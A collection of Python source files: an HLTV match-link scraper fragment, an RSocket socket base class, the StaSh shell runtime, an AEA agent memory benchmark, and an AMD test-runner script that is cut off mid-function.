with open('data.csv', "r", newline="") as file:
reader = csv.reader(file)
for row in reader:
if row[0] == f'https://www.hltv.org{arr[k]}':
error = 1
if error == 0:
            print(f'Match - {k}, thread - {i}')
print(f'https://www.hltv.org{arr[k]}')
get_data(f'https://www.hltv.org{arr[k]}')
"""for k in range(len(arr)):
print(f'Матч - {k}, поток - {i}')
print(f'https://www.hltv.org{arr[k]}')
get_data(f'https://www.hltv.org{arr[k]}')"""
for i in range(3):
with open(f'data/matches_links_{i}.json') as file:
a = json.load(file)
main(a, 1)
"""tmp = []
for i in range(0, 20):
with open(f'data/matches_links_{i}.json') as file:
a = json.load(file)
tmp.append(Thread(target=main, args=(a, i)))
for i in tmp:
i.start()
"""
|
socket_abc.py
|
import queue
import typing
from rsockets2.frames import Frame_ABC, KeepAliveFrame
from rsockets2.frames import FrameParser
from abc import ABC, abstractmethod
import threading
import logging
class Socket_ABC(ABC):
def __init__(self, resume_support_enabled=False):
super().__init__()
self.resume_support_enabled = resume_support_enabled
def callback_throw(message: str):
def _inner(*args, **kwargs):
raise Exception(message)
return _inner
self._log = logging.getLogger("rsockets2.socket.socket_abc")
self._receive_handler_bytes = callback_throw(
"Receive Handler Not Set!")
self._socket_closed_handler = callback_throw(
"Socket Closed Handler Not Set!")
self._parser = FrameParser()
self._send_position = 0
self._recv_position = 0
        self._foreign_send_position = 0
self._send_queue = queue.PriorityQueue(1000)
self._data_send_store = {}
self.__running = True
self._send_thread = threading.Thread(
name="RSocket-Send-Thread", daemon=True, target=self._send_loop)
self._send_thread.start()
def send_frame(self, frame: Frame_ABC):
if frame.stream_id == 0:
self._send_queue.put((10, frame.to_bytes()))
else:
self._send_queue.put((100, frame.to_bytes()))
@abstractmethod
def _send_frame_internal(self, data: bytes):
raise NotImplementedError()
def _receive_wrapper(self, data: bytes):
self._recv_position += len(data)
frame = self._parser.parseFrame(data)
if isinstance(frame, KeepAliveFrame):
            self._foreign_send_position = frame.last_received_position
return frame
def set_receive_handler(self, callback: typing.Callable[[Frame_ABC], None]):
        # Wrap the callback in a custom handler so that it receives the parsed frame instead of the raw bytes
self._receive_handler_bytes = lambda data: callback(
self._receive_wrapper(data))
def set_socket_closed_handler(self, callback):
self._socket_closed_handler = callback
def close(self):
self.__running = False
self._close_internal()
@abstractmethod
def _close_internal(self):
raise NotImplementedError()
def get_recv_position(self) -> int:
return self._recv_position
def _send_loop(self):
try:
while self.__running:
data = self._send_queue.get()[1]
self._send_position += len(data)
                if self.resume_support_enabled:
self._data_send_store[self._send_position] = data
self._clear_data_send_store()
self._send_frame_internal(data)
except Exception as err:
            if self.__running:
self._log.debug(
"Error in send_loop: {}".format(err), exc_info=True)
else:
self._log.error(
"Error in send_loop: {}".format(err), exc_info=True)
def _clear_data_send_store(self):
keys_to_remove = []
for key in self._data_send_store.keys():
            if key < self._foreign_send_position:
keys_to_remove.append(key)
for key in keys_to_remove:
del self._data_send_store[key]
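

# Minimal illustrative sketch (an assumption, not part of rsockets2) of how a concrete
# transport might subclass Socket_ABC: only the two abstract hooks have to be provided.
class _LoopbackSocket(Socket_ABC):
    """Toy transport that feeds every sent frame straight back into the receive path."""

    def _send_frame_internal(self, data: bytes):
        # Echo the raw frame bytes to whatever handler was registered via
        # set_receive_handler(); a real transport would write to a TCP or
        # WebSocket connection here.
        self._receive_handler_bytes(data)

    def _close_internal(self):
        # Nothing to tear down for the in-memory loopback.
        pass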
|
shruntime.py
|
# coding: utf-8
import os
import sys
import platform
import logging
import threading
import functools
from six import StringIO, text_type, binary_type, PY3
try:
file
except NameError:
from io import IOBase as file
import pyparsing as pp
# Detecting environments
try:
import ui
from objc_util import on_main_thread
except ImportError:
from . import dummyui as ui
from .dummyobjc_util import on_main_thread
from .shcommon import ShBadSubstitution, ShInternalError, ShIsDirectory, \
ShFileNotFound, ShEventNotFound, ShNotExecutable
# noinspection PyProtectedMember
from .shcommon import _STASH_ROOT, _STASH_HISTORY_FILE, _SYS_STDOUT, _SYS_STDERR
from .shcommon import is_binary_file, _STASH_EXTENSION_BIN_PATH
from .shparsers import ShPipeSequence
from .shthreads import ShBaseThread, ShTracedThread, ShCtypesThread, ShState, ShWorkerRegistry
# Default .stashrc file
_DEFAULT_RC = r"""BIN_PATH=~/Documents/bin:{bin_ext}:$BIN_PATH
SELFUPDATE_BRANCH=master
PYTHONPATH=$STASH_ROOT/lib:$PYTHONPATH
alias env='printenv'
alias logout='echo "Use the close button in the upper right corner to exit StaSh."'
alias help='man'
alias la='ls -a'
alias ll='ls -la'
alias copy='pbcopy'
alias paste='pbpaste'
alias unmount='umount'
""".format(
bin_ext=_STASH_EXTENSION_BIN_PATH,
)
class ShRuntime(object):
"""
Runtime class responsible for parsing and executing commands.
"""
def __init__(self, stash, parser, expander, no_historyfile=False, debug=False):
self.stash = stash
self.parser = parser
self.expander = expander
self.debug = debug
self.logger = logging.getLogger('StaSh.Runtime')
self.state = ShState(
environ=dict(os.environ,
HOME2=os.path.join(os.environ['HOME'], 'Documents'),
STASH_ROOT=_STASH_ROOT,
STASH_PY_VERSION=platform.python_version(),
BIN_PATH=os.path.join(_STASH_ROOT, 'bin'),
# Must have a placeholder because it is needed before _DEFAULT_RC is loaded
PROMPT='[\W]$ ',
PYTHONISTA_ROOT=os.path.dirname(sys.executable)
),
sys_stdin=self.stash.io,
sys_stdout=self.stash.io,
sys_stderr=self.stash.io,
)
self.child_thread = None
self.worker_registry = ShWorkerRegistry()
config = stash.config
self.rcfile = os.path.join(_STASH_ROOT, config.get('system', 'rcfile'))
self.historyfile = os.path.join(_STASH_ROOT, _STASH_HISTORY_FILE)
self.HISTORY_MAX = config.getint('display', 'HISTORY_MAX')
self.py_traceback = config.getint('system', 'py_traceback')
self.py_pdb = config.getint('system', 'py_pdb')
self.input_encoding_utf8 = config.getint('system', 'input_encoding_utf8')
self.ipython_style_history_search = config.getint(
'system', 'ipython_style_history_search')
self.ShThread = {'traced': ShTracedThread, 'ctypes': ShCtypesThread}.get(
config.get('system', 'thread_type'),
ShCtypesThread
)
# load history from last session
# NOTE the first entry in history is the latest one
if not no_historyfile:
try:
with open(self.historyfile) as ins:
                    # History is stored newest first: history[0] is the most recent entry
self.history = [line.strip() for line in ins.readlines()]
except IOError:
self.history = []
else:
self.history = []
self.history_alt = []
self.history_listsource = ui.ListDataSource(self.history)
self.history_listsource.action = self.history_popover_tapped
self.idx_to_history = -1
self.history_templine = ''
def load_rcfile(self, no_rcfile=False):
self.stash(_DEFAULT_RC.splitlines(),
persistent_level=1,
add_to_history=False, add_new_inp_line=False)
if not no_rcfile and os.path.exists(self.rcfile) and os.path.isfile(self.rcfile):
try:
with open(self.rcfile) as ins:
self.stash(ins.readlines(),
persistent_level=1,
add_to_history=False, add_new_inp_line=False)
except IOError:
self.stash.write_message('%s: error reading rcfile\n' % self.rcfile)
def find_script_file(self, filename):
_, current_state = self.get_current_worker_and_state()
dir_match_found = False
# direct match of the filename, e.g. full path, relative path etc.
for fname in (filename, filename + '.py', filename + '.sh'):
if os.path.exists(fname):
if os.path.isdir(fname):
dir_match_found = True
else:
return fname
# Match for commands in current dir and BIN_PATH
# Effectively, current dir is always the first in BIN_PATH
for path in ['.'] + current_state.environ_get('BIN_PATH').split(':'):
path = os.path.abspath(os.path.expanduser(path))
if os.path.exists(path):
for f in os.listdir(path):
if f == filename or f == filename + '.py' or f == filename + '.sh':
if os.path.isdir(f):
dir_match_found = True
else:
return os.path.join(path, f)
if dir_match_found:
raise ShIsDirectory('%s: is a directory' % filename)
else:
raise ShFileNotFound('%s: command not found' % filename)
def get_all_script_names(self):
""" This function used for completer, whitespaces in names are escaped"""
_, current_state = self.get_current_worker_and_state()
all_names = []
for path in ['.'] + current_state.environ_get('BIN_PATH').split(':'):
path = os.path.expanduser(path)
if os.path.exists(path):
for f in os.listdir(path):
if not os.path.isdir(f) and (f.endswith('.py') or f.endswith('.sh')):
all_names.append(f.replace(' ', '\\ '))
return all_names
def run(self, input_=None,
final_ins=None, final_outs=None, final_errs=None,
add_to_history=None,
add_new_inp_line=None,
persistent_level=0,
is_background=False,
environ={},
cwd=None):
"""
This is the entry for running shell commands.
:param input_: Default to ShIO
:param final_ins:
:param final_outs:
        :param final_errs:
:param add_to_history:
:param add_new_inp_line:
        :param persistent_level:
            The persistence level dictates how variables from the child shell
            are carried over to the parent shell.
            Possible values are:
                0 - No persistence at all (shell scripts run in this mode by default).
                1 - Full persistence. The parent's variables end up identical to the
                    child's (user commands typed at the terminal run in this mode).
                2 - Semi persistence. Future children start with the current child's
                    ending variables (the __call__ interface uses this mode by
                    default).
:param environ:
:param cwd:
:return:
:rtype: ShBaseThread
"""
# By default read from the terminal
if input_ is None:
input_ = self.stash.io
# noinspection PyDocstring
def fn():
current_worker, _ = self.get_current_worker_and_state()
is_top = current_worker.is_top_level()
try:
if isinstance(input_, ShPipeSequence):
self.run_pipe_sequence(input_,
final_ins=final_ins,
final_outs=final_outs,
final_errs=final_errs,
environ=environ,
cwd=cwd)
else:
if type(input_) is list:
lines = input_
elif input_ == self.stash.io:
lines = self.stash.io.readline_no_block()
else:
lines = input_.splitlines()
for line in lines:
# Ignore empty lines
if line.strip() == '':
continue
# Parse and expand the line (note this function returns a generator object)
expanded = self.expander.expand(line)
# The first member is the history expanded form and number of pipe_sequence
newline, n_pipe_sequences = next(expanded)
                        # Only add a history entry if:
                        # 1. it is explicitly required, or
                        # 2. it is a first-layer thread spawned directly by the main thread
                        #    and adding has not been explicitly suppressed
if (add_to_history is None and is_top) or add_to_history:
self.add_history(newline)
if is_top:
self.history_swap()
try:
# Subsequent members are actual commands
for _ in range(n_pipe_sequences):
pipe_sequence = next(expanded)
if pipe_sequence.in_background:
# For background command, separate worker is created
self.run(pipe_sequence,
final_ins=final_ins,
final_outs=final_outs,
final_errs=final_errs,
persistent_level=0,
is_background=True,
environ=environ,
cwd=cwd)
else:
self.run_pipe_sequence(pipe_sequence,
final_ins=final_ins,
final_outs=final_outs,
final_errs=final_errs,
environ=environ, cwd=cwd)
finally:
if is_top:
self.history_swap()
except pp.ParseException as e:
if self.debug:
self.logger.debug('ParseException: %s\n' % repr(e))
self.stash.write_message('syntax error: at char %d: %s\n' % (e.loc, e.pstr))
except ShEventNotFound as e:
if self.debug:
self.logger.debug('%s\n' % repr(e))
self.stash.write_message('%s: event not found\n' % e.args[0])
except ShBadSubstitution as e:
if self.debug:
self.logger.debug('%s\n' % repr(e))
self.stash.write_message('%s\n' % e.args[0])
except ShInternalError as e:
if self.debug:
self.logger.debug('%s\n' % repr(e))
self.stash.write_message('%s\n' % e.args[0])
except IOError as e:
if self.debug:
self.logger.debug('IOError: %s\n' % repr(e))
self.stash.write_message('%s: %s\n' % (e.filename, e.strerror))
except KeyboardInterrupt as e:
self.stash.write_message('^C\nKeyboardInterrupt: %s\n' % e.args[0])
# This catch all exception handler is to handle errors outside of
# run_pipe_sequence. The traceback print is mainly for debugging
# the shell itself as opposed to the running script (handled inside
# exec_py_file)
except Exception as e:
etype, evalue, tb = sys.exc_info()
if self.debug:
self.logger.debug('Exception: %s\n' % repr(e))
self.stash.write_message('%s\n' % repr(e))
if self.py_traceback or self.py_pdb:
import traceback
traceback.print_exception(etype, evalue, tb)
finally:
# Housekeeping for the thread, e.g. remove itself from registry
current_worker.cleanup()
# Prompt is now ready for more user input for commands to run,
# if new input line is explicitly specified or when the worker
# thread's parent is the runtime itself and new input line is
# not explicitly suppressed
if add_new_inp_line or (is_top and add_new_inp_line is not False):
self.script_will_end()
# Saves its state to parent or if persistent is required
if not current_worker.is_background:
current_worker.parent.state.persist_child(
current_worker.state, persistent_level=persistent_level)
# Get the parent thread
parent_thread = threading.currentThread()
# UI thread is substituted by runtime
if not isinstance(parent_thread, ShBaseThread):
parent_thread = self
child_thread = self.ShThread(
self.worker_registry, parent_thread, input_, target=fn, is_background=is_background, environ=environ, cwd=cwd)
child_thread.start()
return child_thread
def script_will_end(self):
self.stash.io.write(self.get_prompt(), no_wait=True)
# Config the mini buffer so that user commands can be processed
self.stash.mini_buffer.config_runtime_callback(
functools.partial(self.run, persistent_level=1))
# Reset any possible external tab handler setting
self.stash.external_tab_handler = None
def run_pipe_sequence(self, pipe_sequence,
final_ins=None, final_outs=None, final_errs=None, environ={}, cwd=None):
if self.debug:
self.logger.debug(str(pipe_sequence))
_, current_state = self.get_current_worker_and_state()
n_simple_commands = len(pipe_sequence.lst)
prev_outs = None
for idx, simple_command in enumerate(pipe_sequence.lst):
# The temporary_environ needs to be reset for each simple command
# i.e. A=42 script1 | script2
# The value of A should not be carried to script2
current_state.temporary_environ = {}
for assignment in simple_command.assignments:
current_state.temporary_environ[assignment.identifier] = assignment.value
# Only update the worker's env for pure assignments
if simple_command.cmd_word == '' and idx == 0 and n_simple_commands == 1:
current_state.environ.update(current_state.temporary_environ)
current_state.temporary_environ = {}
if prev_outs:
# If previous output has gone to a file, we use a dummy empty string as ins
ins = StringIO() if type(prev_outs) == file else prev_outs
else:
ins = final_ins or current_state.sys_stdin__
outs = current_state.sys_stdout__
errs = current_state.sys_stderr__
if simple_command.io_redirect:
# Truncate file or append to file
mode = 'w' if simple_command.io_redirect.operator == '>' else 'a'
# For simplicity, stdout redirect works for stderr as well.
# Note this is different from a real shell.
if simple_command.io_redirect.filename == '&3':
outs = _SYS_STDOUT
errs = _SYS_STDERR
else:
errs = outs = open(simple_command.io_redirect.filename, mode)
elif idx < n_simple_commands - 1: # before the last piped command
outs = StringIO()
else:
if final_outs:
outs = final_outs
if final_errs:
errs = final_errs
if self.debug:
self.logger.debug('io %s %s\n' % (ins, outs))
try:
if simple_command.cmd_word != '':
script_file = self.find_script_file(simple_command.cmd_word)
if self.debug:
self.logger.debug('script is %s\n' % script_file)
if self.input_encoding_utf8:
                            # Python 2 is not fully unicode compatible. Some modules (e.g. runpy)
                            # insist on ASCII arguments. The encoding here helps eliminate possible
                            # errors caused by unicode arguments.
simple_command_args = [arg.encode('utf-8') for arg in simple_command.args]
else:
simple_command_args = simple_command.args
if script_file.endswith('.py'):
self.exec_py_file(script_file, simple_command_args, ins, outs, errs)
elif is_binary_file(script_file):
raise ShNotExecutable(script_file)
else:
self.exec_sh_file(script_file, simple_command_args, ins, outs, errs)
else:
current_state.return_value = 0
if current_state.return_value != 0:
break # break out of the pipe_sequence, but NOT pipe_sequence list
if isinstance(outs, StringIO):
outs.seek(0) # rewind for next command in the pipe sequence
prev_outs = outs
# This catch all exception is for when the exception is raised
# outside of the actual command execution, i.e. exec_py_file
# exec_sh_file, e.g. command not found, not executable etc.
except ShFileNotFound as e:
err_msg = '%s\n' % e.args[0]
if self.debug:
self.logger.debug(err_msg)
self.stash.write_message(err_msg)
# set exit code to 127
current_state.return_value = 127
break # break out of the pipe_sequence, but NOT pipe_sequence list
except Exception as e:
err_msg = '%s\n' % e.args[0]
if self.debug:
self.logger.debug(err_msg)
self.stash.write_message(err_msg)
break # break out of the pipe_sequence, but NOT pipe_sequence list
finally:
if isinstance(outs, file) and not isinstance(outs, StringIO):
# StringIO is subclass of IOBase in py3 but not in py2
outs.close()
if isinstance(ins, StringIO): # release the string buffer
ins.close()
def exec_py_file(self, filename,
args=None,
ins=None, outs=None, errs=None):
_, current_state = self.get_current_worker_and_state()
if ins:
current_state.sys_stdin = ins
if outs:
current_state.sys_stdout = outs
if errs:
current_state.sys_stderr = errs
file_path = os.path.relpath(filename)
namespace = dict(locals(), **globals())
namespace['__name__'] = '__main__'
namespace['__file__'] = os.path.abspath(file_path)
namespace['_stash'] = self.stash
saved_sys_argv = sys.argv[:]
# First argument is the script name
argv = [os.path.basename(filename)] + (args or [])
argv = self.encode_argv(argv)
sys.argv = argv
# Set current os environ to the threading environ
saved_os_environ = os.environ
os.environ = dict(current_state.environ)
# Honor any leading vars, e.g. A=42 echo $A
os.environ.update(current_state.temporary_environ)
# This needs to be done after environ due to possible leading PYTHONPATH var
saved_sys_path = sys.path
sys.path = current_state.sys_path[:]
self.handle_PYTHONPATH() # Make sure PYTHONPATH is honored
try:
with open(file_path, "rU") as f:
content = f.read()
code = compile(
content, file_path, "exec", dont_inherit=True
)
exec(code, namespace, namespace)
current_state.return_value = 0
except SystemExit as e:
current_state.return_value = e.code
except Exception as e:
current_state.return_value = 1
etype, evalue, tb = sys.exc_info()
err_msg = '%s: %s\n' % (repr(etype), evalue)
if self.debug:
self.logger.debug(err_msg)
self.stash.write_message(err_msg)
if self.py_traceback or self.py_pdb:
import traceback
traceback.print_exception(etype, evalue, tb)
if self.py_pdb:
import pdb
pdb.post_mortem(tb)
finally:
# Thread specific vars are not modified, e.g. current_state.environ is unchanged.
# This means the vars cannot be changed inside a python script. It can only be
# done through shell command, e.g. NEW_VAR=42
sys.argv = saved_sys_argv
sys.path = saved_sys_path
os.environ = saved_os_environ
def exec_sh_file(self, filename,
args=None,
ins=None, outs=None, errs=None,
add_to_history=None):
_, current_state = self.get_current_worker_and_state()
if args is None:
args = []
args = self.encode_argv(args)
for i, arg in enumerate([filename] + args):
current_state.temporary_environ[str(i)] = arg
current_state.temporary_environ['#'] = len(args)
current_state.temporary_environ['@'] = '\t'.join(args)
# Enclosing variables will be merged to environ when creating new thread
try:
with open(filename, "rU") as fins:
child_worker = self.run(fins.readlines(),
final_ins=ins,
final_outs=outs,
final_errs=errs,
add_to_history=add_to_history,
add_new_inp_line=False,
persistent_level=0)
child_worker.join()
current_state.return_value = child_worker.state.return_value
except IOError as e:
self.stash.write_message('%s: %s\n' % (e.filename, e.strerror))
current_state.return_value = 1
except:
self.stash.write_message('%s: error while executing shell script\n' % filename)
current_state.return_value = 2
def encode_argv(self, argv):
"""
        Convert an argv list into the appropriate string type for the
        Python version currently in use.
"""
if PY3:
# we need unicode argv
argv = [c if isinstance(c, text_type) else c.decode("utf-8") for c in argv]
else:
# we need bytestring argv
argv = [c if isinstance(c, binary_type) else c.encode("utf-8") for c in argv]
return argv
def get_prompt(self):
"""
Get the prompt string. Fill with current working directory if required
"""
_, current_state = self.get_current_worker_and_state()
prompt = current_state.environ_get('PROMPT')
if prompt.find('\\W') != -1 or prompt.find('\\w') != -1:
curdir = os.getcwd().replace(current_state.environ_get('HOME'), '~')
prompt = prompt.replace('\\w', curdir)
prompt = prompt.replace('\\W',
curdir if os.path.dirname(curdir) == '~'
else os.path.basename(curdir))
return self.stash.text_color(prompt, 'smoke')
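    # Worked example (illustrative): with PROMPT='[\W]$ ' and the current directory at
    # $HOME/Documents/bin, curdir becomes '~/Documents/bin', '\W' expands to the basename
    # 'bin' and the prompt renders as '[bin]$ '. At $HOME/Documents the dirname is '~',
    # so the full '~/Documents' is shown instead: '[~/Documents]$ '.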
def push_to_background(self):
if self.child_thread:
self.stash.write_message('pushing current job to background ...\n')
self.child_thread.set_background()
self.script_will_end()
else:
self.stash.write_message('no running foreground job\n')
self.stash.io.write(self.stash.runtime.get_prompt())
@on_main_thread
def push_to_foreground(self, worker):
worker.set_background(False)
self.stash.mini_buffer.config_runtime_callback(None)
self.stash.write_message(
'job {} is now running in foreground ...'.format(worker.job_id))
# TODO: The history stuff should be handled by a separate class
def add_history(self, s):
if s.strip() != '' and (self.history == [] or s != self.history[0]):
self.history.insert(0, s.strip()) # remove any surrounding whites
if len(self.history) > self.HISTORY_MAX:
self.history = self.history[0:self.HISTORY_MAX]
self.history_listsource.items = self.history
self.reset_idx_to_history()
def save_history(self):
try:
with open(self.historyfile, 'w') as outs:
outs.write('\n'.join(self.history))
except IOError:
pass
def search_history(self, tok):
search_string = tok[1:]
if search_string == '':
return ''
if search_string == '!':
return self.history[0]
try:
idx = int(search_string)
try:
return self.history[::-1][idx]
except IndexError:
raise ShEventNotFound(tok)
except ValueError:
for entry in self.history:
if entry.startswith(search_string):
return entry
raise ShEventNotFound(tok)
def history_up(self):
        # Save the unfinished line the user is typing before showing entries from history
if self.idx_to_history == -1:
self.history_templine = self.stash.mini_buffer.modifiable_string.rstrip()
self.idx_to_history += 1
if self.idx_to_history >= len(self.history):
self.idx_to_history = len(self.history) - 1
else:
entry = self.history[self.idx_to_history]
            # When moving up away from an unfinished input line, search history for
            # an entry that starts with the unfinished line
if self.idx_to_history == 0 and self.ipython_style_history_search:
for idx, hs in enumerate(self.history):
if hs.startswith(self.history_templine):
entry = hs
self.idx_to_history = idx
break
self.stash.mini_buffer.feed(None, entry)
def history_dn(self):
self.idx_to_history -= 1
if self.idx_to_history < -1:
self.idx_to_history = -1
else:
if self.idx_to_history == -1:
entry = self.history_templine
else:
entry = self.history[self.idx_to_history]
self.stash.mini_buffer.feed(None, entry)
def reset_idx_to_history(self):
self.idx_to_history = -1
def history_popover_tapped(self, sender):
if sender.selected_row >= 0:
            # Save the unfinished line the user is typing before showing entries from history
if self.idx_to_history == -1:
self.history_templine = self.stash.mini_buffer.modifiable_string.rstrip()
self.stash.mini_buffer.feed(None, sender.items[sender.selected_row])
self.idx_to_history = sender.selected_row
def history_swap(self):
self.history, self.history_alt = self.history_alt, self.history
def get_current_worker_and_state(self):
"""
Get the current thread and its associated state.
:return:
:rtype: (ShBaseThread, ShState)
"""
current_worker = threading.currentThread()
if isinstance(current_worker, ShBaseThread):
return current_worker, current_worker.state
else: # UI thread uses runtime for its state
return None, self.state
@staticmethod
def handle_PYTHONPATH():
"""
        Add any user-set Python paths right after the '.' entry in sys.path,
        or at the beginning if '.' is not present.
"""
python_path = os.environ.get('PYTHONPATH', None) # atomic access for check and retrieval
if python_path:
try:
idxdot = sys.path.index('.') + 1
except ValueError:
idxdot = 0
# Insert in the reversed order so idxdot does not need to change
for pth in reversed(python_path.split(':')):
if pth == '':
continue
pth = os.path.expanduser(pth)
if pth not in sys.path:
sys.path.insert(idxdot, pth)
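        # Worked example (illustrative): with sys.path == ['/app', '.', '/lib'] and
        # PYTHONPATH == 'x:y', idxdot is 2; inserting 'y' and then 'x' at that index
        # yields ['/app', '.', 'x', 'y', '/lib'], so the user paths keep their order
        # immediately after '.'.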
|
case.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# ------------------------------------------------------------------------------
#
# Copyright 2022 Valory AG
# Copyright 2018-2021 Fetch.AI Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ------------------------------------------------------------------------------
"""Memory usage check."""
import time
from threading import Thread
from typing import List, Tuple, Union
from aea_cli_benchmark.utils import SyncedGeneratorConnection # noqa: I100
from aea_cli_benchmark.utils import (
get_mem_usage_in_mb,
make_agent,
make_envelope,
make_skill,
wait_for_condition,
)
from aea.protocols.base import Message
from aea.registries.resources import Resources
from aea.skills.base import Handler
from packages.fetchai.protocols.default.message import DefaultMessage
class TestHandler(Handler):
"""Dummy handler to handle messages."""
SUPPORTED_PROTOCOL = DefaultMessage.protocol_id
def setup(self) -> None:
"""Noop setup."""
def teardown(self) -> None:
"""Noop teardown."""
def handle(self, message: Message) -> None:
"""Handle incoming message."""
self.context.outbox.put(make_envelope(message.to, message.sender))
def run(duration: int, runtime_mode: str) -> List[Tuple[str, Union[int, float]]]:
"""Check memory usage."""
# pylint: disable=import-outside-toplevel,unused-import
# import manually due to some lazy imports in decision_maker
import aea.decision_maker.default # noqa: F401
connection = SyncedGeneratorConnection.make()
resources = Resources()
resources.add_connection(connection)
agent = make_agent(runtime_mode=runtime_mode, resources=resources)
agent.resources.add_skill(make_skill(agent, handlers={"test": TestHandler}))
t = Thread(target=agent.start, daemon=True)
t.start()
wait_for_condition(lambda: agent.is_running, timeout=5)
connection.enable()
time.sleep(duration)
connection.disable()
mem_usage = get_mem_usage_in_mb()
agent.stop()
t.join(5)
rate = connection.count_in / duration
return [
("envelopes received", connection.count_in),
("envelopes sent", connection.count_out),
("rate (envelopes/second)", rate),
("mem usage (Mb)", mem_usage),
]
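

# Illustrative usage only; the runtime_mode value "async" is an assumption based on
# AEA's documented runtime options and may not match every benchmark setup.
if __name__ == "__main__":
    for metric_name, metric_value in run(duration=10, runtime_mode="async"):
        print(f"{metric_name}: {metric_value}")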
|
rtest.py
|
#!/usr/bin/python3
"""Copyright 2021 Advanced Micro Devices, Inc.
Run tests on build"""
import re
import os
import sys
import subprocess
import shlex
import argparse
import pathlib
import platform
from genericpath import exists
from fnmatch import fnmatchcase
from xml.dom import minidom
import multiprocessing
import time
import signal  # needed by TimerProcess.run() to send SIGKILL on non-Windows platforms
SCRIPT_VERSION = 0.1
args = {}
OS_info = {}
timeout = False
test_proc = None
stop = 0
fail_regex = r'error|fail'
test_script = [ 'cd %IDIR%', '%XML%' ]
class ArgAction(argparse.Action):
def __init__(self, option_strings, dest, nargs=None, **kwargs):
if nargs != 2:
raise ValueError("nargs must be 2")
super().__init__(option_strings, dest, nargs, **kwargs)
def __call__(self, parser, namespace, values, option_string=None):
old = getattr(namespace, self.dest, {})
if old is None:
new = {values[0]: values[1]}
else:
new = {**old, values[0]: values[1]}
setattr(namespace, self.dest, new)
def parse_args():
"""Parse command-line arguments"""
parser = argparse.ArgumentParser(description="""
Checks build arguments
""")
parser.add_argument('-t', '--test', required=True, type=str, action='append',
help='Test set to run from rtest.xml (required, e.g. osdb)')
parser.add_argument('-g', '--debug', required=False, default=False, action='store_true',
help='Test Debug build (optional, default: false)')
parser.add_argument('-o', '--output', type=str, required=False, default="xml",
help='Test output file (optional, default: test_detail.xml)')
parser.add_argument('-a', '--argument', action=ArgAction, nargs=2, metavar=('NAME', 'VALUE'), default={},
help='Arguments to substitute into the xml file (optional, multiple)')
parser.add_argument( '--install_dir', type=str, required=False, default="build",
help='Installation directory where build or release folders are (optional, default: build)')
parser.add_argument( '--fail_test', default=False, required=False, action='store_true',
help='Return as if test failed (optional, default: false)')
# parser.add_argument('-v', '--verbose', required=False, default = False, action='store_true',
# help='Verbose install (optional, default: False)')
return parser.parse_args()
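# Example invocation (illustrative; the test set name and the substituted variable are
# assumptions, real values come from the accompanying rtest.xml):
#   python3 rtest.py -t osdb --install_dir build -a GFILTER "*gemm*"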
def vram_detect():
global OS_info
OS_info["VRAM"] = 0
if os.name == "nt":
cmd = "hipinfo.exe"
process = subprocess.run([cmd], stdout=subprocess.PIPE)
for line_in in process.stdout.decode().splitlines():
if 'totalGlobalMem' in line_in:
OS_info["VRAM"] = float(line_in.split()[1])
break
else:
cmd = "rocminfo"
process = subprocess.run([cmd], stdout=subprocess.PIPE)
for line_in in process.stdout.decode().splitlines():
match = re.search(r'.*Size:.*([0-9]+)\(.*\).*KB', line_in, re.IGNORECASE)
if match:
OS_info["VRAM"] = float(match.group(1))/(1024*1024)
break
def os_detect():
global OS_info
if os.name == "nt":
OS_info["ID"] = platform.system()
else:
inf_file = "/etc/os-release"
if os.path.exists(inf_file):
with open(inf_file) as f:
for line in f:
if "=" in line:
k,v = line.strip().split("=")
OS_info[k] = v.replace('"','')
OS_info["NUM_PROC"] = os.cpu_count()
vram_detect()
print(OS_info)
def create_dir(dir_path):
if os.path.isabs(dir_path):
full_path = dir_path
else:
full_path = os.path.join( os.getcwd(), dir_path )
return pathlib.Path(full_path).mkdir(parents=True, exist_ok=True)
def delete_dir(dir_path) :
if (not os.path.exists(dir_path)):
return
if os.name == "nt":
return run_cmd( "RMDIR" , f"/S /Q {dir_path}")
else:
linux_path = pathlib.Path(dir_path).absolute()
return run_cmd( "rm" , f"-rf {linux_path}")
class TimerProcess(multiprocessing.Process):
def __init__(self, start, stop, kill_pid):
multiprocessing.Process.__init__(self)
self.quit = multiprocessing.Event()
self.timed_out = multiprocessing.Event()
self.start_time = start
self.max_time = stop
self.kill_pid = kill_pid
def run(self):
while not self.quit.is_set():
#print( f'time_stop {self.start_time} limit {self.max_time}')
if (self.max_time == 0):
return
t = time.monotonic()
if ( t - self.start_time > self.max_time ):
print( f'killing {self.kill_pid} t {t}')
if os.name == "nt":
cmd = ['TASKKILL', '/F', '/T', '/PID', str(self.kill_pid)]
proc = subprocess.Popen(cmd, stdout=sys.stdout, stderr=sys.stderr)
else:
os.kill(self.kill_pid, signal.SIGKILL)
self.timed_out.set()
self.stop()
pass
def stop(self):
self.quit.set()
def stopped(self):
return self.timed_out.is_set()
def time_stop(start, pid):
global timeout, stop
while (True):
print( f'time_stop {start} limit {stop}')
t = time.monotonic()
if (stop == 0):
return
if ( (stop > 0) and (t - start > stop) ):
print( f'killing {pid} t {t}')
if os.name == "nt":
cmd = ['TASKKILL', '/F', '/T', '/PID', str(pid)]
proc = subprocess.Popen(cmd, stdout=sys.stdout, stderr=sys.stderr)
else:
test_proc.kill()
timeout = True
stop = 0
time.sleep(0)
def find_cmd(cmd):
if os.name == "nt":
status, _ = subprocess.getstatusoutput(f"where {cmd}")
if status != 0:
raise RuntimeError(f"Cannot find the command or executable {cmd}")
return cmd
else:
status, _ = subprocess.getstatusoutput(f"which {cmd}")
if status == 0:
return cmd
search_paths = [
"."
]
for path_option in search_paths:
cmd_opt = f"{path_option}/{cmd}"
if os.path.isfile(cmd_opt) and os.access(cmd_opt, os.X_OK):
return cmd_opt
raise RuntimeError(f"Cannot find the command or executable {cmd}")
def run_cmd(cmd, test = False, time_limit = 0):
global args
global test_proc, timer_thread
global stop
if (cmd.startswith('cd ')):
return os.chdir(cmd[3:])
if (cmd.startswith('mkdir ')):
return create_dir(cmd[6:])
cmdline = f"{cmd}"
print(cmdline)
try:
if not test:
proc = subprocess.run(cmdline, check=True, stderr=subprocess.STDOUT, shell=True)
status = proc.returncode
else:
error = False
timeout = False
cmd_parts = shlex.split(cmdline)
